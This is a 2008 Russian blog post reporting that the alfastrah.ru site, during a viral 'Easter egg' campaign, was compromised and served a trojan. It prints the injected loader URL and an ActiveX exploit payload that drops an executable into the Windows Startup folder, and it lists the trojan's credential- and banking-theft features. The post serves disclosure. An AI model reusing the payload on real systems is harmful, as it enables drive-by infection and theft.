Вирусный маркетинг

Два дня назад на сайте alfastrah. ru появилось так называемое «пасхальное яйцо» — если кликнуть 5-6 раз на номер телефона в правом верхнем углу в шапке сайта начинал играть ролик эротического содержания. Подробно детали вирусной акции описаны здесь .

Не секрет, что вирусный маркетинг ориентирован на очень быстрое распространение — заходы на сайт росли по экспоненте. На некоторых форумах появились предупреждения о том, что при заходе на сайт Касперский ругается и говорит, что на сайте сидит троян. В разговоре с сотрудниками лаборатории Касперского эта информация подтвердилась. Таким образом, «вирусный маркетинг» обернулся буквально вирусным. Привожу некоторые экспертные комментарии.

Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус.

Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус. Интересен способ внедрения: он вставлен аккуратно в центр страницы. Грузит вот что (скрипт даже не зашифрован): google-analyze. com/counter/index. php.

HTTP/1.1 200 OK

Date: Tue, 25 Nov 2008 15:43 GMT

Server: Apache/2.2.3 (CentOS)

X-Powered-By: PHP/5.1.6

Vary: Accept-Encoding, User-Agent

Content-Length: 475

Connection: close

Content-Type: text/html

<object classid=«clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id=«attack»></object>

<script>

var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser. exe';

attack. SnapshotPath = arbitrary_file;

attack. CompressedPath = destination;

attack. PrintSnapshot(arbitrary_file, destination);

</script>

<embed src=«pdf. php» type=«application/pdf» width=100 height=100></embed>

У вируса есть особенность – блокировка загрузки при повторном посещении – вирус попадает на комп только при первой загрузке с какого-нибудь айпишника, при повторных уже нет. Так что если смотрят из конторы, где ходят через прокси – пострадает только первый посмотревший.

Для внедрения на сайт была использована незакрытая уязвимость.

В функционал бота, помимо стандартных процедур инсталляции себя в систему, внедрения в запущенные процессы, борьбы с некоторыми антивирусами, предоставления услуг анонимного socks - и http прокси-сервера, входит и мощнейшая процедура кражи информации:

1. Троянец ворует содержимое Protected Storage, в котором содержатся пользовательские пароли.
2. Формграббер. Троянец перехватывает любые отправляемые через браузер данные, вводимые в формы. Контролируемые адреса, с которых перехватывается информация, — это, как правило, адреса банков и платежных систем. Таким образом происходит кража аккаунтов.
3. Обход виртуальных клавиатур. Троянец перехватывает нажатие кнопки мыши и делает скриншот экрана в этот момент.
4. Подмена сайтов и страничек. Это весьма интересный способ, ранее использовавшийся именно в Nuclear Grabber. При попытке пользователя выйти на один из сайтов, обращение к которым контролируется троянцем, происходит либо редирект запроса на поддельный фишинговый сайт, либо добавление в оригинальную страницу сайта нового поля для ввода данных. Содержимое страницы подменяется прямо на компьютере пользователя, еще до отображения в браузере!
5. Кража сертификатов.

Несмотря на обращения в Альфа-страхование со стороны ЛК и других лиц (я сам, например, 2 письма им написал), уязвимость все еще не устранена, а на сайте висит троян — уже вроде бы новый.

Хочу поблагодарить сотрудников лаборатории Касперского за оперативность и технические комментарии.